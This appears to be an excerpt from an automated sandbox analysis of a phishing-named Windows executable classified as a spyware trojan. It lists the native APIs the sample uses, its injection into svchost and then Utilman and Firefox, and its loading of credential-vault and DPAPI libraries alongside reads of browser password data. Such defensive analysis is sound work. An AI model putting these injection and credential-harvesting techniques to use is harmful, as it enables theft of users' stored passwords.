                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03972DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039735C0 NtCreateMutant,LdrInitializeThunk,2_2_039735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974340 NtSetContextThread,2_2_03974340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974650 NtSuspendThread,2_2_03974650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B80 NtQueryInformationFile,2_2_03972B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BA0 NtEnumerateValueKey,2_2_03972BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BF0 NtAllocateVirtualMemory,2_2_03972BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BE0 NtQueryValueKey,2_2_03972BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AB0 NtWaitForSingleObject,2_2_03972AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AD0 NtReadFile,2_2_03972AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AF0 NtWriteFile,2_2_03972AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F90 NtProtectVirtualMemory,2_2_03972F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FB0 NtResumeThread,2_2_03972FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FA0 NtQuerySection,2_2_03972FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FE0 NtCreateFile,2_2_03972FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F30 NtCreateSection,2_2_03972F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F60 NtCreateProcessEx,2_2_03972F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E80 NtReadVirtualMemory,2_2_03972E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EA0 NtAdjustPrivilegesToken,2_2_03972EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EE0 NtQueueApcThread,2_2_03972EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E30 NtWriteVirtualMemory,2_2_03972E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DB0 NtEnumerateKey,2_2_03972DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DD0 NtDelayExecution,2_2_03972DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D10 NtMapViewOfSection,2_2_03972D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D00 NtSetInformationFile,2_2_03972D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D30 NtUnmapViewOfSection,2_2_03972D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CA0 NtQueryInformationToken,2_2_03972CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CC0 NtQueryVirtualMemory,2_2_03972CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CF0 NtOpenProcess,2_2_03972CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C00 NtQueryInformationProcess,2_2_03972C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C70 NtFreeVirtualMemory,2_2_03972C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C60 NtCreateKey,2_2_03972C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973090 NtSetValueKey,2_2_03973090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973010 NtOpenDirectoryObject,2_2_03973010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039739B0 NtGetContextThread,2_2_039739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D10 NtOpenProcessToken,2_2_03973D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D70 NtOpenThread,2_2_03973D70
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FC6685: CreateFileW,DeviceIoControl,CloseHandle,0_2_00FC6685
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FBACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00FBACC5
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FC79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00FC79D3
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FAB0430_2_00FAB043
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00F932000_2_00F93200
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00F93B700_2_00F93B70
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FB410F0_2_00FB410F
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FA02A40_2_00FA02A4
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00F8E3B00_2_00F8E3B0
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FB038E0_2_00FB038E
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FA06D90_2_00FA06D9
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FB467F0_2_00FB467F
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FEAACE0_2_00FEAACE
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FB4BEF0_2_00FB4BEF
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FACCC10_2_00FACCC1
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00F8AF500_2_00F8AF50
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00F86F070_2_00F86F07
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FE31BC0_2_00FE31BC
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FAD1B90_2_00FAD1B9
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00F9B11F0_2_00F9B11F
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FB724D0_2_00FB724D
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FA123A0_2_00FA123A
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00F893F00_2_00F893F0
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FC13CA0_2_00FC13CA
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00F9F5630_2_00F9F563
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FCB6CC0_2_00FCB6CC
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00F896C00_2_00F896C0
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FEF7FF0_2_00FEF7FF
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00F877B00_2_00F877B0
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FB79C90_2_00FB79C9
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00F9FA570_2_00F9FA57
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00F89B600_2_00F89B60
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00F87D190_2_00F87D19
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FA9ED00_2_00FA9ED0
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00F9FE6F0_2_00F9FE6F
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00F87FA30_2_00F87FA3
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_01A4D3F00_2_01A4D3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004186332_2_00418633
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E0132_2_0040E013
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004100232_2_00410023
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168332_2_00416833
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011402_2_00401140
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1582_2_0040E158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1632_2_0040E163
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004041AF2_2_004041AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004043142_2_00404314
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401CA02_2_00401CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FDFB2_2_0040FDFB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042ED932_2_0042ED93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FE032_2_0040FE03
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402ED02_2_00402ED0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A003E62_2_03A003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F02_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA3522_2_039FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C02C02_2_039C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E02742_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A001AA2_2_03A001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F41A22_2_039F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F81CC2_2_039F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA1182_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039301002_2_03930100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C81582_2_039C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D20002_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C02_2_0393C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039647502_2_03964750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039407702_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C6E02_2_0395C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A005912_2_03A00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039405352_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EE4F62_2_039EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E44202_2_039E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F24462_2_039F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F6BD72_2_039F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB402_2_039FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA802_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0A9A62_2_03A0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A02_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039569622_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039268B82_2_039268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E8F02_2_0396E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394A8402_2_0394A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039428402_2_03942840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BEFA02_2_039BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932FC82_2_03932FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394CFE02_2_0394CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960F302_2_03960F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E2F302_2_039E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03982F282_2_03982F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4F402_2_039B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952E902_2_03952E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FCE932_2_039FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FEEDB2_2_039FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393AE0D2_2_0393AE0D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FEE262_2_039FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940E592_2_03940E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03958DBF2_2_03958DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DCD1F2_2_039DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394AD002_2_0394AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0CB52_2_039E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930CF22_2_03930CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940C002_2_03940C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0398739A2_2_0398739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F132D2_2_039F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392D34C2_2_0392D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039452A02_2_039452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395B2C02_2_0395B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E12ED2_2_039E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394B1B02_2_0394B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0B16B2_2_03A0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392F1722_2_0392F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397516C2_2_0397516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EF0CC2_2_039EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039470C02_2_039470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F70E92_2_039F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF0E02_2_039FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF7B02_2_039FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F16CC2_2_039F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039856302_2_03985630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DD5B02_2_039DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A095C32_2_03A095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F75712_2_039F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF43F2_2_039FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039314602_2_03931460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395FB802_2_0395FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B5BF02_2_039B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397DBF92_2_0397DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFB762_2_039FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DDAAC2_2_039DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03985AA02_2_03985AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E1AA32_2_039E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EDAC62_2_039EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFA492_2_039FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F7A462_2_039F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B3A6C2_2_039B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D59102_2_039D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039499502_2_03949950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395B9502_2_0395B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039438E02_2_039438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AD8002_2_039AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03941F922_2_03941F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFFB12_2_039FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFF092_2_039FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03949EB02_2_03949EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395FDC02_2_0395FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F1D5A2_2_039F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03943D402_2_03943D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F7D732_2_039F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFCF22_2_039FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B9C322_2_039B9C32
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: String function: 00F9EC2F appears 68 times
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: String function: 00FA6AC0 appears 42 times
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: String function: 00FAF8A0 appears 35 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03975130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03987E54 appears 111 times
                Source: Mandatory Notice for all December Leave and Vacation application.exe, 00000000.00000003.2126730837.00000000041DD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Mandatory Notice for all December Leave and Vacation application.exe
                Source: Mandatory Notice for all December Leave and Vacation application.exe, 00000000.00000003.2127040179.0000000004033000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Mandatory Notice for all December Leave and Vacation application.exe
                Source: Mandatory Notice for all December Leave and Vacation application.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@7/7
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FCCE7A GetLastError,FormatMessageW,0_2_00FCCE7A
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FBAB84 AdjustTokenPrivileges,CloseHandle,0_2_00FBAB84
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FBB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00FBB134
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FCE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00FCE1FD
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FC6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00FC6532
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FDC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_00FDC18C
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00F8406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00F8406B
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeFile created: C:\Users\user\AppData\Local\Temp\autB2CC.tmpJump to behavior
                Source: Mandatory Notice for all December Leave and Vacation application.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Utilman.exe, 00000005.00000003.2699098393.0000000002BA8000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000005.00000002.4579598695.0000000002BB3000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000005.00000002.4579598695.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000005.00000003.2698993095.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000005.00000002.4579598695.0000000002BA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Mandatory Notice for all December Leave and Vacation application.exeReversingLabs: Detection: 36%
                Source: unknownProcess created: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe "C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe"
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe"
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeProcess created: C:\Windows\SysWOW64\Utilman.exe "C:\Windows\SysWOW64\Utilman.exe"
                Source: C:\Windows\SysWOW64\Utilman.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe"Jump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeProcess created: C:\Windows\SysWOW64\Utilman.exe "C:\Windows\SysWOW64\Utilman.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: oleacc.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: duser.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: dui70.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: dpapi.dllJump to behavior
